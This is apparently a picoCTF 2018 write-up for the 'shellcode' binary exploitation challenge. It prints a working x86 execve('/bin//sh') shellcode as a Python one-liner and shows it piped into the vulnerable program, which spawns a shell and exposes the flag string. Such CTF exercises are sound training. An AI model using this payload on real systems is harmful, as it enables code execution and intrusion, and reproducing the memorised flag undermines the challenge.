Skip to content

Latest commit

 

History

History

shellcode

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 

shellcode

Binary Exploitation - 200 points

Challenge

This program executes any input you give it. Can you get a shell? You can find the program in /problems/shellcode_3_09e0c5074980877d900d65c545d1e127 on the shell server.

Source.

Solution

The right shellcode must be used.

These few seem to work for me:

Referring to @LFlare's writeup from PicoCTF 2017

$ python -c "print('\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80')" > ~/payload

$ cat ~/payload - | ./vuln 
Enter a string!
j
 X?Rh//shh/bin??1?̀
Thanks! Executing now...
ls
flag.txt  vuln	vuln.c
cat flag.txt
picoCTF{shellc0de_w00h00_7f5a7309}